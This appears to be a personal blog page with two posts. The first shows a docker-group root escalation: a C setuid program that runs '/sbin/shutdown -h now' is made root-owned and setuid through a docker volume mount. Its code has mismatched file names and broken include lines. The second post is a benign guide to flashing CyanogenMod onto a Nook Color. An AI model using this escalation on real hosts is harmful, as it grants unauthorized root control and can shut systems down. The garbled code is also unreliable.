Serious docker root exploit

I was amazed at how easy this was.  I found a couple different websites that lead me to this, giving credit where credit is due

1. http://yatb.giacomodrago.com/en/post/10/shutdown-linux-system-from-within-php-script.html

2. http://reventlov.com/advisories/using-the-docker-command-to-root-the-host

So putting 1 and 2 together.  I have my docker install running as the “docker” user, so no “sudo” required.  All I did (as docker) is :

1. Create the following snippet of C code shutdown_suid.c :
docker $> vi shutdown_suid.c
include <stdlib.h>
include <unistd.h>

int main() {
setuid(0);
system(“/sbin/shutdown -h now”); /* change this to the actual location of shutdown */
return 0;
}

2. Compile it :docker $> gcc -o shutdown_setuid shutdown_setuid.c

3. Exploit docker to mount the current directory and set rebuild_setuid to be owned as root and turn on the setuid permissions :
docker $> docker run -v $PWD:/stuff -t dockerdev/rhel /bin/bash -c ‘chown root.root /stuff/reboot_setuid && chmod a+s /stuff/reboot_setuid’

4. docker $> ls -la shutdown_setuid
-rwsrwsr-x. 1 root root 6623 May 29 11:54 shutdown_setuid

Turning your Nook Color into an Android 4.1 Jellybean tablet

Converting a nook color into a Jellybean 4.1 tablet.  I think it took me longer to write this up than to actually do it 🙂

Done on Linux Mint – bash commands are showing in bold italics

  1. grab a microsd card – they say that Sandisk brand, at least Class 4 works best.
    I have done this with both a 4GB and 8GB card, both worked, you can go larger – I am not sure if there is a max capacity supported by Android or the nook
  2. Download the boot image – http://forum.xda-developers.com/showthread.php?p=32921666#post32921666
    Look for the attachment to the main article – generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip
    I get a md5sum of : a2f15e48a5bb858db8ec02ccedbcb5b7
  3. glaw@mint:~$ mkdir nook
  4. glaw@mint:~/nook$ wget http://download.cyanogenmod.com/get/jenkins/17892/cm-10-20130114-NIGHTLY-encore.zip  
  5. glaw@mint:~/nook$ wget http://goo.im/gapps/gapps-jb-20121011-signed.zip
  6. glaw@mint:~/nook$ md5sum cm*.zip gapp*.zip
    3cc2124c8f91e133ec28d438ccd5204f  cm-10-20130114-NIGHTLY-encore.zip
    4e9e7ec3c22b0b3471bd05d62b8a659d  gapps-jb-20121011-signed.zip
  7. glaw@mint:~/nook$ unzip generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip
    Archive:  generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip
      inflating: generic-sdcard-v1.3-CM7-9-10-larger-Rev5.img
  8. glaw@mint:~/nook$ sudo dd if=generic-sdcard-v1.3-CM7-9-10-larger-Rev5.img of=/dev/sde bs=1M
    [sudo] password for glaw: 
    298+1 records in
    298+1 records out
    312560640 bytes (313 MB) copied, 69.6386 s, 4.5 MB/s
  9. eject the card and reinsert – I just disconnected my card reader and reconnected
  10. Mount the cd card – this is a 300 mb vfat parition

    glaw@mint:~/nook$ sudo mount /dev/sde1 /mnt
    glaw@mint:~/nook$ls -la /mnt

    total 8112
    drwxr-xr-x  2 root root    4096 Dec 31  1969 .
    drwxr-xr-x 27 root root    4096 Jan 18 00:13 ..
    -rwxr-xr-x  1 root root   14504 Feb 15  2011 MLO
    -rwxr-xr-x  1 root root  289328 May 29  2011 u-boot.bin
    -rwxr-xr-x  1 root root 2756116 May 14  2011 uImage
    -rwxr-xr-x  1 root root 5234466 Oct 17 19:41 uRamdisk
  11. glaw@mint:~/nook$ sudo cp cm*.zip gapp*.zip /mnt
    glaw@mint:~/nook$ls -la /mnt

    total 253116
    drwxr-xr-x  2 root root      4096 Dec 31  1969 .
    drwxr-xr-x 27 root root      4096 Jan 18 00:13 ..
    -rwxr-xr-x  1 root root 158172246 Jan 19 10:14 cm-10-20130114-NIGHTLY-encore.zip
    -rwxr-xr-x  1 root root  92706064 Jan 19 10:15 gapps-jb-20121011-signed.zip
    -rwxr-xr-x  1 root root     14504 Feb 15  2011 MLO
    -rwxr-xr-x  1 root root    289328 May 29  2011 u-boot.bin
    -rwxr-xr-x  1 root root   2756116 May 14  2011 uImage
    -rwxr-xr-x  1 root root   5234466 Oct 17 19:41 uRamdisk
  12. glaw@mint:~/nook$ sudo umount /mnt
  13. eject the card,
  14. With the nook powered off, insert into the nook’s microsd slot and then power on.  Sit back and relax for 4 and a half minutes :
    http://www.youtube.com/watch?v=Bsipwz3pk3I
  15. repower on the nook and welcome to Android Jellybean.
    http://www.youtube.com/watch?v=3vaO3W6HJU4